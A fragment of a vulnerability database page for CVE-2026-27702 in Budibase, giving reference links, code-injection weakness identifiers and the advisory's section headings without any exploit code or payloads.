        "type": "Primary"
      }
    ]
  },
  "published": "2026-02-25T16:23:26.777",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/Budibase/budibase/pull/18087"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/Budibase/budibase/releases/tag/3.30.4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-94"
        },
        {
          "lang": "en",
          "value": "CWE-95"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27702 (GCVE-0-2026-27702)

GHSA-RVHR-26G4-P2R8

Summary

Details

Root Cause

Attack Flow

Exploitation Vector

Verified on Production

Proof of Concept

PoC Script

Video Demo

Reproduction Steps

Additional Note

Responsible Disclosure Statement

FKIE_CVE-2026-27702

Tags

Sightings

Nomenclature